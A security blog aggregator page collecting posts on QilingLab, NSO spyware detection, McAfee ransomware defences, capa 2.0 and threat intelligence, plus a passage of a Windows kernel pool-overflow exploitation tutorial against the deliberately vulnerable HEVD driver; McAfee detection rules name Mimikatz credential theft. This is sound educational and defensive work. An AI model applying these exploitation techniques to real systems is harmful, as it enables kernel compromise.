Normal view

There are new articles available, click to refresh the page.

Before yesterdayVulnerabily Research

Shielder
QilingLab – Release
21 July 2021 at 15:00

QilingLab – Release

21 July 2021 at 15:00

Two years ago Ross Marks created the FridaLab challenge as a playground to test and learn how to use the Frida dynamic instrumentation toolkit. At that time, I solved FridaLab and wrote a writeup about it explaining the main APIs and usages of Frida for Android. This helped others to start getting familiar with it and as a reference when developing Frida scripts. After trying Qiling for some time I decided to follow Ross Marks’ steps and to develop a basic playground challenge to make use of the main Qiling features and I obviously called it QilingLab.

ZecOps Blog
NSO Exploits Still Remain Mysterious: ZecOps Can Help You Fight BackZecOps Research Team
19 July 2021 at 09:57

NSO Exploits Still Remain Mysterious: ZecOps Can Help You Fight Back

ZecOps Blog

By: ZecOps Research Team

19 July 2021 at 09:57

NSO Exploits Still Remain Mysterious: ZecOps Can Help You Fight Back

This weekend, the Guardian released a groundbreaking report that authoritarian governments have breached the mobile devices of human rights activists, journalists, and lawyers across the world, using a hacking software sold by NSO Group.

While the Guardian report contained new information regarding the targets of NSO customers and the Pegasus spyware, the specific mobile vulnerabilities that NSO leveraged were not identified and remain unpatched. This means that despite the public attribution, NSO tools remain just as powerful today as they were prior to the report.

Fight Back with ZecOps!

ZecOps suspects that NSO will quickly alter its methods so that the specific IOCs, or indicators of compromise, will be difficult to identify by mobile security researchers. However, with our Mobile EDR product, we can help your organization identify NSO attacks automatically by focusing on the behavior that remains present in the logs in addition to the publically known IOCs.

Note: ZecOps does not collect or access your personal information. ZecOps will only collect information required for mobile security investigations, leaving personal information out.

Inspecting Your Phone – Free Inspection by ZecOps

To help discover these attacks, ZecOps is offering, for a limited time, free mobile inspections to businesses that were targeted by the NSO. Please fill out the form below, and a member of our team will be in touch with you.

First name:

Last name:

Title:

Company:

Business email:

Phone number:

Country:

Comments (Optional):

We got your request.

Please make sure that you have filled in all the fields.

McAfee Blogs
Fighting new Ransomware Techniques with McAfee’s Latest InnovationsNicolas Stricher
20 July 2021 at 04:01

Fighting new Ransomware Techniques with McAfee’s Latest Innovations

McAfee Blogs

By: Nicolas Stricher

20 July 2021 at 04:01

In 2021 ransomware attacks have been dominant among the bigger cyber security stories. Hence, I was not surprised to see that McAfee’s June 2021 Threat report is primarily focused on this topic.

This report provides a large range of statistics using the McAfee data lake behind MVISION Insights, including the Top MITRE ATT&CK Techniques. In this report I highlight the following MITRE techniques:

Spear phishing links (Initial Access)
Exploit public-facing applications (Initial Access)
Windows Command Shell (Execution)
User execution (Execution)
Process Injection (Privilege escalation)
Credentials from Web Browsers (Credential Access)
Exfiltration to Cloud Storage (Exfiltration)

I also want to highlight one obvious technique which remains common across all ransomware attacks at the end of the attack lifecycle:

Data encrypted for impact (Impact)

Traditional defences based on anti-malware signatures and web protection against known malicious domains and IP addresses can be insufficient to protect against these techniques. Therefore, for the rest of this article, I want to cover a few recent McAfee innovations which can make a big difference in the fight against ransomware.

Unified Cloud Edge with Remote Browser Isolation

The following three ransomware techniques are linked to web access:

Spear phishing links
User execution
Exfiltration to Cloud Storage

Moreover, most ransomware attacks require some form of access to a command-and-control server to be fully operational.

McAfee Remote Browser Isolation (RBI) ensures no malicious web content ever even reaches enterprise endpoints’ web browsers by isolating all browsing activity to unknown and risky websites into a remote virtual environment. With spear phishing links, RBI works best when running the mail client in the web browser. The user systems cannot be compromised if web code or files cannot run on them, making RBI the most powerful form of web threat protection available. RBI is included in most McAfee United Cloud Edge (UCE) licenses at no additional cost.

Figure 1. Concept of Remote Browser Isolation

McAfee Client Proxy (MCP) controls all web traffic, including ransomware web traffic initiated without a web browser by tools like MEGAsync and Rclone. MCP is part of McAfee United Cloud Edge (UCE).

Protection Against Fileless Attacks

The following ransomware techniques are linked to fileless attacks:

Windows Command Shell (Execution)
Process Injection (Privilege escalation)
User Execution (Execution)

Many ransomware attacks also use PowerShell.

Figure 2. Example of an attack kill chain with fileless

McAfee provides a large range of technologies which protect against fileless attack methods, including McAfee ENS (Endpoint Security) Exploit prevention and McAfee ENS 10.7 Adaptive Threat Protection (ATP). Here are few examples of Exploit Prevention and ATP rules:

Exploit 6113-6114-6115-6121 Fileless threat: self-injection
Exploit 6116-6117-6122: Mimikatz suspicious activity
ATP 316: Prevent PDF readers from starting cmd.exe
ATP 502: Prevent new services from being created via sc.exe or powershell.exe

Regarding the use on Mimikatz in the example above, the new McAfee ENS 10.7 ATP Credential Theft Protection is designed to cease attacks against Windows LSASS so that you do not need to rely on the detection of Mimikatz.

Figure 3. Example of Exploit Prevention rules related to Mimikatz

ENS 10.7 ATP is now included in most McAfee Endpoint Security licenses at no additional cost.

Proactive Monitoring and Hunting with MVISION EDR

To prevent initial access, you also need to reduce the risks linked to the following technique:

Exploit public facing applications (Initial Access)

For example, RDP (Windows Remote Desktop Protocol) is a common initial access used by ransomware attacks. You may have a policy that already prohibits or restricts RDP but how do you know it is enforced on every endpoint?

With MVISION EDR (Endpoint Detection and Response) you can perform a real time search across all managed systems to see what is happening right now.

Figure 4. MVISION EDR Real-time Search to verify if RDP is enabled or disabled on a system

Figure 5. MVISION EDR Real-time Search to identify systems with active connections on RDP

MVISION EDR maintains a history of network connections inbound and outbound from the client. Performing an historical search for network traffic could identify systems that actively communicated on port 3389 to unauthorized addresses, potentially detecting attempts at exploitation.

MVISION EDR also enables proactive monitoring by a security analyst. The Monitoring Dashboard helps the analyst in the SOC quickly triage suspicious behavior.

For more EDR use cases related to ransomware see this blog article.

Actionable Threat Intelligence

With MVISION Insights you do not need to wait for the latest McAfee Threat Report to be informed on the latest ransomware campaigns and threat profiles. With MVISION Insights you can easily meet the following use cases:

Proactively assess your organization’s exposure to ransomware and prescribe how to reduce the attack surface:
- Detect whether you have been hit by a known ransomware campaign
- Run a Cyber Threat Intelligence program despite a lack of time and expertise
- Prioritize threat hunting using the most relevant indicators

These use cases are covered in the webinar How to fight Ransomware with the latest McAfee innovations.

Regarding the following technique from the McAfee June 2021 Threat Report:

Credentials from Web Browsers (Credential Access)

MVISION Insights can display the detections in your environment as well as prevalence statistics.

Figure 6. Prevalence statistics from MVISION Insights on the LAZAGNE tool

MVISION Insights is included in several Endpoint Security licenses.

Rollback of Ransomware Encryption

Now we are left with the last technique in the attack lifecycle:

Data encrypted for impact (Impact)

McAfee ENS 10.7 Adaptive Threat Protection (ATP) provides dynamic application containment of suspicious processes and enhanced remediation with an automatic rollback of the ransomware encryption.

Figure 7. Configuration of Rollback remediation in ENS 10.7

You can see how files impacted by ransomware can be restored through Enhanced Remediation in this video. For more best practices on tuning Dynamic Application Containment rules, check the knowledge base article here.

Additional McAfee Protection Against Ransomware

Last year McAfee released this blog article covering additional capabilities from McAfee Endpoint Security (ENS), Endpoint Detection and Response (EDR) and the Management Console (ePO) against ransomware including:

ENS Exploit prevention
ENS Firewall
ENS Web control
ENS Self protection
ENS Story Graph
ePO Protection workspace
Additional EDR use cases against ransomware

Summary

To increase your protection against ransomware you might already be entitled to:

ENS 10.7 Adaptive Threat Protection
Unified Cloud Edge with Remote Browser Isolation and McAfee Client Proxy
MVISION Insights
MVISION EDR

If you are, you should start using them as soon as possible, and if you are not, contact us.

The post Fighting new Ransomware Techniques with McAfee’s Latest Innovations appeared first on McAfee Blog.

Threat Research
capa 2.0: Better, Faster, StrongerWilliam Ballenthin
19 July 2021 at 18:00

capa 2.0: Better, Faster, Stronger

Threat Research

By: William Ballenthin

19 July 2021 at 18:00

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and checkout the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.

Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.

Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.

Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.

Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.

Figure 5: capa v1.6 results without library code recognition

Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.

Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in high-optimized routines, such as memcpy, to opt-in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it's not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license) we have spent significant time to create a comprehensive FLIRT signature set for the common malware analysis use-case. The signatures come included with capa and are also available at our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
- C and C++ run-time libraries
- Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
The following open-source projects as compiled with VS2015, VS2017, and VS2019:
- CryptoPP
- curl
- Microsoft Detours
- Mbed TLS (previously PolarSSL)
- OpenSSL
- zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpgk and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

Host Interaction describes program functionality to interact with the file system, processes, and the registry
Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
Collection describes functionality used to steal data such as credentials or credit card information
Data Manipulation describes capabilities to encrypt, decrypt, and hash data
Communication describes data transfer techniques such as HTTP, DNS, and TCP

Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

McAfee Blogs
An Overall Philosophy on the Use of Critical Threat IntelligencePatrick Flynn
16 July 2021 at 20:15

An Overall Philosophy on the Use of Critical Threat Intelligence

McAfee Blogs

By: Patrick Flynn

16 July 2021 at 20:15

The overarching threat facing cyber organizations today is a highly skilled asymmetric enemy, well-funded and resolute in his task and purpose. You never can exactly tell how they will come at you, but come they will. It’s no different than fighting a kinetic foe in that, before you fight, you must choose your ground and study your enemy’s tendencies.

A lot of focus has been placed on tools and updating technology, but often we are pushed back on our heels and find ourselves fighting a defensive action.

But what if we change? How do we do that?

The first step is to study the battlefield, understand what you’re trying to protect and lay down your protection strategy. Pretty basic right??

Your technology strategy is very important, but you must embrace and create a thorough Cyber Threat Intelligence (CTI) doctrine which must take on many forms.

First, there is data, and lots of it. However, the data must take specific forms to research and detect nascent elements where the adversary is attempting to catch you napping or give you the perception that the activity you see is normal.

As you pool this data, it must be segmented into layers and literally mapped to geographic locations across the globe. The data is classified distinctly as malicious and reputations are applied. This is a vital step in that it enables analytical programs, along with human intelligence analysts to apply the data within intelligence reports which themselves can take on many forms.

Once the data takes an analytic form, then it allows organizations to forensically piece together a picture of an attack. This process is painstakingly tedious but necessary to understand your enemy and his tendencies. Tools are useful, but it’s always the human in the loop that will recognize the tactical and strategic implications of an adversary’s moves. Once you see the picture, it becomes real, and then you’re able to prepare your enterprise for the conflict that follows.

Your early warning and sensing strategy must incorporate this philosophy. You must sense, collect, exploit, process, produce and utilize each intelligence product that renders useful information. It’s this process that will enable any organization to move decisively to and stay “left of boom”.

The McAfee Advanced Programs Group (APG) was created eight years ago to support intelligence organizations that embrace and maintain a strong CTI stance. Its philosophy is to blend people, processes, data and a strong intelligence heritage to enable our customers to understand the cyber battlefield to proactively protect, but “maneuver” when necessary to avoid an attack.

APG applies three key disciplines or mission areas to provide this support.

First, we developed an internal tool called the Advanced Threat Landscape Analysis System (ATLAS). This enables our organization to apply our malicious threat detections to a geospatial map display to see where we’re seeing malicious data. ATLAS draws from our global network of billions of threat sensors to see trillions of detections each day, but enables our analysts to concentrate on the most malicious activity. Then we’re better able to research and report accurate threat landscape information.

The second leg in the stool is our analytical staff, the true cyber ninjas that apply decades of experience supporting HUMINT operations across the globe and a well-established intelligence-based targeting philosophy to the cyber environment. The result is a true understanding of the cyber battlefield enabling the leadership to make solid “intelligence-based” decisions.

Finally, the third leg is our ability to develop custom solutions and interfaces to adapt in a very custom way our ability to see and study data. We have the ability to leverage 2.8 billion malicious detections, along with 20 other distinct malicious feeds, to correlate many different views, just not the McAfee view. We interpret agnostically.

These three legs provide APG a powerful CTI advantage allowing our customers to adapt and respond to events by producing threat intelligence dynamically. When using this service it allows the customer to be fully situationally aware in a moments notice (visual command and control). Access to the data alone is an immense asset to any organization. This allows each customer not only to know what their telemetry is, but also provides real time insights into the entire world ecosystem. Finally, the human analysis alone is immensely valuable. It allows for the organizations to read and see/understand what it all means (the who, what, where and why). “The so what!!”

The post An Overall Philosophy on the Use of Critical Threat Intelligence appeared first on McAfee Blog.

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2

Connor McGarr

By: Connor McGarr

18 July 2021 at 00:00

Introduction

This blog serves as Part 2 of a two-part series about pool corruption in the age of the segment heap on Windows. Part 1, which can be found here starts this series out by leveraging an out-of-bounds read vulnerability to bypass kASLR from low integrity. Chaining this information leak vulnerability with the bug outlined in this post, which is a pool overflow leading to an arbitrary read/write primitive, we will close out this series by outlining why pool corruption in the age of the segment heap has had the scope of techniques, in my estimation, lessened from the days of Windows 7.

Due to the release of Windows 11 recently, which will have Virtualization-Based Security (VBS) and Hypervisor Protected Code Integrity (HVCI) enabled by default, we will pay homage to page table entry corruption techniques to bypass SMEP and DEP in the kernel with the exploit outlined in this blog post. Although Windows 11 will not be found in the enterprise for some time, as is the case with rolling out new technologies in any enterprise - vulnerability researchers will need to start moving away from leveraging artificially created executable memory regions in the kernel to execute code to either data-only style attacks or to investigate more novel techniques to bypass VBS and HVCI. This is the direction I hope to start taking my research in the future. This will most likely be the last post of mine which leverages page table entry corruption for exploitation.

Although there are much better explanations of pool internals on Windows, such as this paper and my coworker Yarden Shafir’s upcoming BlackHat 2021 USA talk found here, Part 1 of this blog series will contain much of the prerequisite knowledge used for this blog post - so although there are better resources, I urge you to read Part 1 first if you are using this blog post as a resource to follow along (which is the intent and explains the length of my posts).

Vulnerability Analysis

Let’s take a look at the source code for BufferOverflowNonPagedPoolNx.c in the win10-klfh branch of HEVD, which reveals a rather trivial and controlled pool-based buffer overflow vulnerability.

The first function within the source file is TriggerBufferOverflowNonPagedPoolNx. This function, which returns a value of type NTSTATUS, is prototyped to accept a buffer, UserBuffer and a size, Size. TriggerBufferOverflowNonPagedPoolNx invokes the kernel mode API ExAllocatePoolWithTag to allocate a chunk from the NonPagedPoolNx pool of size POOL_BUFFER_SIZE. Where does this size come from? Taking a look at the very beginning of BufferOverflowNonPagedPoolNx.c we can clearly see that BufferOverflowNonPagedPoolNx.h is included.

Taking a look at this header file, we can see a #define directive for the size, which is determined by a processor directive to make this variable 16 on a Windows 64-bit machine, which we are testing from. We now know that the pool chunk that will be allocated from the call to ExAllocatePoolWithTag within TriggerBufferOverfloowNx is 16 bytes.

The kernel mode pool chunk, which is now allocated on the NonPagedPoolNx is managed by the return value of ExAllocatePoolWithTag, which is KernelBuffer in this case. Looking a bit further down the code we can see that RtlCopyMemory, which is a wrapper for a call to memcpy, copies the value UserBuffer into the allocation managed by KernelBuffer. The size of the buffer copied into KernelBuffer is managed by Size. After the chunk is written to, based on the code in BufferOverflowNonPagedPoolNx.c, the pool chunk is also subsequently freed.

This basically means that the value specified by Size and UserBuffer will be used in the copy operation to copy memory into the pool chunk. We know that UserBuffer and Size are baked into the function definition for TriggerBufferOverflowNonPagedPoolNx, but where do these values come from? Taking a look further into BufferOverflowNonPagedPoolNx.c, we can actually see these values are extracted from the IRP sent to this function via the IOCTL handler.

This means that the client interacting with the driver via DeviceIoControl is able to control the contents and the size of the buffer copied into the pool chunk allocated on the NonPagedPoolNx, which is 16 bytes. The vulnerability here is that we can control the size and contents of the memory copied into the pool chunk, meaning we could specify a value greater than 16, which would write to memory outside the bounds of the allocation, a la an out-of-bounds write vulnerability, known as a “pool overflow” in this case.

Let’s put this theory to the test by expanding upon our exploit from part one and triggering the vulnerability.

Triggering The Vulnerability

We will leverage the previous exploit from Part 1 and tack on the pool overflow code to the end, after the for loop which does parsing to extract the base address of HEVD.sys. This code can be seen below, which sends a buffer of 50 bytes to the pool chunk of 16 bytes. The IOCTL for to reach the TriggerBufferOverflowNonPagedPool function is 0x0022204b

After this allocation is made and the pool chunk is subsequently freed, we can see that a BSOD occurs with a bug check indicating that a pool header has been corrupted.

This is the result of our out-of-bounds write vulnerability, which has corrupted a pool header. When a pool header is corrupted and the chunk is subsequently freed, an “integrity” check is performed on the in-scope pool chunk to ensure it has a valid header. Because we have arbitrarily written contents past the pool chunk allocated for our buffer sent from user mode, we have subsequently overwritten other pool chunks. Due to this, and due to every chunk in the kLFH, which is where our allocation resides based on heuristics mentioned in Part 1, being prepended with a _POOL_HEADER structure - we have subsequently corrupted the header of each subsequent chunk. We can confirm this by setting a breakpoint on on call to ExAllocatePoolWithTag and enabling debug printing to see the layout of the pool before the free occurs.

The breakpoint set on the address fffff80d397561de, which is the first breakpoint seen being set in the above photo, is a breakpoint on the actual call to ExAllocatePoolWithTag. The breakpoint set at the address fffff80d39756336 is the instruction that comes directly before the call to ExFreePoolWithTag. This breakpoint is hit at the bottom of the above photo via Breakpoint 3 hit. This is to ensure execution pauses before the chunk is freed.

We can then inspect the vulnerable chunk responsible for the overflow to determine if the _POOL_HEADER tag corresponds with the chunk, which it does.

After letting execution resume, a bug check again incurs. This is due to a pool chunk being freed which has an invalid header.

This validates that an out-of-bounds write does exist. The question is now, with a kASLR bypass in hand - how to we comprehensively execute kernel-mode code from user mode?

Exploitation Strategy

Fair warning - this section contains a lot code analysis to understand what this driver is doing in order to groom the pool, so please bear this in mind.

As you can recall from Part 1, the key to pool exploitation in the age of the segment heap it to find objects, when exploiting the kLFH specifically, that are of the same size as the vulnerable object, contain an interesting member in the object, can be called from user mode, and are allocated on the same pool type as the vulnerable object. We can recall earlier that the size of the vulnerable object was 16 bytes in size. The goal here now is to look at the source code of the driver to determine if there isn’t a useful object that we can allocate which will meet all of the specified parameters above. Note again, this is the toughest part about pool exploitation is finding objects worthwhile.

Luckily, and slightly contrived, there are two files called ArbitraryReadWriteHelperNonPagedPoolNx.c and ArbitraryReadWriteHelperNonPagedPoolNx.h, which are useful to us. As the name can specify, these files seem to allocate some sort of object on the NonPagedPoolNx. Again, note that at this point in the real world we would need to reverse engineer the driver and look at all instances of pool allocations, inspect their arguments at runtime, and see if there isn’t a way to get useful objects on the same pool and kLFH bucket as the vulnerable object for pool grooming.

ArbitraryReadWriteHelperNonPagedPoolNx.h contains two interesting structures, seen below, as well several function definitions (which we will touch on later - please make sure you become familiar with these structures and their members!).

As we can see, each function definition defines a parameter of type PARW_HELPER_OBJECT_IO, which is a pointer to an ARW_HELP_OBJECT_IO object, defined in the above image!

Let’s examine ArbitraryReadWriteHelpeNonPagedPoolNx.c in order to determine how these ARW_HELPER_OBJECT_IO objects are being instantiated and leveraged in the defined functions in the above image.

Looking at ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see it contains several IOCTL handlers. This is indicative that these ARW_HELPER_OBJECT_IO objects will be sent from a client (us). Let’s take a look at the first IOCTL handler.

It appears that ARW_HELPER_OBJECT_IO objects are created through the CreateArbitraryReadWriteHelperObjectNonPagedPoolNxIoctlHandler IOCTL handler. This handler accepts a buffer, casts the buffer to type ARW_HELP_OBJECT_IO and passes the buffer to the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Let’s inspect CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

CreateArbitraryReadWriteHelperObjectNonPagedPoolNx first declares a few things:

A pointer called Name
A SIZE_T variable, Length
An NTSTATUS variable which is set to STATUS_SUCCESS for error handling purposes
An integer, FreeIndex, which is set to the value STATUS_INVALID_INDEX
A pointer of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, called ARWHelperObject, which is a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we saw previously defined in ArbitraryReadWriteHelperNonPagedPoolNx.h.

The function, after declaring the pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX previously mentioned, probes the input buffer from the client, parsed from the IOCTL handler, to verify it is in user mode and then stores the length specified by the ARW_HELPER_OBJECT_IO structure’s Length member into the previously declared variable Length. This ARW_HELPER_OBJECT_IO structure is taken from the user mode client interacting with the driver (us), meaning it is supplied from the call to DeviceIoControl.

Then, a function called GetFreeIndex is called and the result of the operation is stored in the previously declared variable FreeIndex. If the return value of this function is equal to STATUS_INVALID_INDEX, the function returns the status to the caller. If the value is not STATUS_INVALID_INDEX, CreateArbitraryReadWriteHelperObjectNonPagedPoolNx then calls ExAllocatePoolWithTag to allocate memory for the previously declared PARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointer, which is called ARWHelperObject. This object is placed on the NonPagedPoolNx, as seen below.

After allocating memory for ARWHelperObject, the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then allocates another chunk from the NonPagedPoolNx and allocates this memory to the previously declared pointer Name.

This newly allocated memory is then initialized to zero. The previously declared pointer, ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT, then has its Name member set to the previously declared pointer Name, which had its memory allocated in the previous ExAllocatePoolWithTag operation, and its Length member set to the local variable Length, which grabbed the length sent by the user mode client in the IOCTL operation, via the input buffer of type ARW_HELPER_OBJECT_IO, as seen below. This essentially just initializes the structure’s values.

Then, an array called g_ARWHelperOjbectNonPagedPoolNx, at the index specified by FreeIndex, is initialized to the address of the ARWHelperObject. This array is actually an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, and managed such objects. This is defined at the beginning of ArbitraryReadWriteHelperNonPagedPoolNx.c, as seen below.

Before moving on - I realize this is a lot of code analysis, but I will add in diagrams and tl;dr’s later to help make sense of all of this. For now, let’s keep digging into the code.

Let’s recall how the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function was prototyped:

NTSTATUS
CreateArbitraryReadWriteHelperObjectNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
);

This HelperObjectIo object is of type PARW_HELPER_OBJECT_IO, which is supplied by a user mode client (us). This structure, which is supplied by us via DeviceIoControl, has its HelperObjectAddress member set to the address of the ARWHelperObject previously allocated in CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. This essentially means that our user mode structure, which is sent to kernel mode, has one of its members, HelperObjectAddress to be specific, set to the address of another kernel mode object. This means this will be bubbled back up to user mode. This is the end of the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function! Let’s update our code to see how this looks dynamically. We can also set a breakpoint on HEVD!CreateArbitraryReadWriteHelperObjectNonPagedPoolNx in WinDbg. Note that the IOCTL to trigger CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is 0x00222063.

We know now that this function will allocate a pool chunk for the ARWHelperObject pointer, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on the call to ExAllocatePoolWIthTag responsible for this, and enable debug printing.

Also note the debug print Name Length is zero. This value was supplied by us from user mode, and since we instantiated the buffer to zero, this is why the length is zero. The FreeIndex is also zero. We will touch on this value later on. After executing the memory allocation operation and inspecting the return value, we can see the familiar Hack pool tag, which is 0x10 bytes (16 bytes) + 0x10 bytes for the _POOL_HEADER_ structure - making this a total of 0x20 bytes. The address of this ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is 0xffff838b6e6d71b0.

